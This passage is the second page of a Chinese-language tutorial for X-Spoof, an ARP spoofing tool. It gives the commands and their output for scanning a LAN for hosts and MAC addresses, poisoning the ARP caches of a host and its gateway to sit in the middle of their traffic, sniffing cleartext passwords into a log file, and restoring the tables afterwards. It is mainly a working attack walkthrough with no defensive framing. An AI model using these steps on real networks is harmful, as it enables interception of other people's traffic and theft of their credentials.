X-Spoof使用详解+工具

5、程序演示

命令1：xspoof -l

WinPCap version: 3, 1, 0, 24
1. \Device\NPF_GenericNdisWanAdapter (Generic NdisWan adapter)
2. \Device\NPF_{C198BDE0-2B71-465D-9340-54DB0C44BE83} (D-Link AirPlus Wireless Adapter)
Address Family: #2
Address Family Name: AF_INET
Address: 192.168.100.3
Netmask: 255.255.255.0
Broadcast Address: 255.255.255.255
3. \Device\NPF_{C915675D-0BD7-4E77-9F7B-1669CA4FF29F} (VMware Virtual Ethernet Adapter)
Address Family: #2
Address Family Name: AF_INET
Address: 192.168.236.1
Netmask: 255.255.255.0
Broadcast Address: 255.255.255.255

命令2：xspoof -f -i 2

WinPCap version: 3, 1, 0, 24

[LOCAL INFORMATION]
Link type: 0
Link speed: 54000000 b/s
Broadcast: 255.255.255.255
Subnet mask: 255.255.255.0
IP address: 192.168.100.3
MAC address: 00-0d-88-f0-e2-1e

[MAC LIST]
IP: 192.168.100.3 MAC: 00-0d-88-f0-e2-1e
IP: 192.168.100.119 MAC: 00-0a-eb-88-cc-8e
IP: 192.168.100.254 MAC: 02-0d-3a-26-49-b5

260 packets received, 0 packets lost.

命令3：xspoof -i 2 -s -p pass.log

Start sniffer thread succeed.
Listening on D-Link AirPlus Wireless Adapter...
Enable IP_ROUTER succeed.
192.168.100.119 -> M -> 192.168.100.254 ...
192.168.100.254 -> M -> 192.168.100.119 ...
Build arp packet complete, arp spoof started.

已经开始在192.168.100.119和192.168.100.254之间进行欺骗，使双方均认为192.168.100.3的MAC地址是对方的真实MAC地址，同时在192.168.100.3启动sniffer，对192.168.100.119和192.168.100.254之间传输的明文密码进行嗅探，结果保存在"pass.log"文件中。

命令4：xspoof -i 2 -r

WinPCap version: 3, 1, 0, 24
Send to 192.168.100.119: MAC of 192.168.100.254 is 02-0d-3a-26-49-b5
Send to 192.168.100.254: MAC of 192.168.100.119 is 00-0a-eb-88-cc-8e
Build arp packet complete.
Restore the arp table of target complete.

上一页  [1] [2]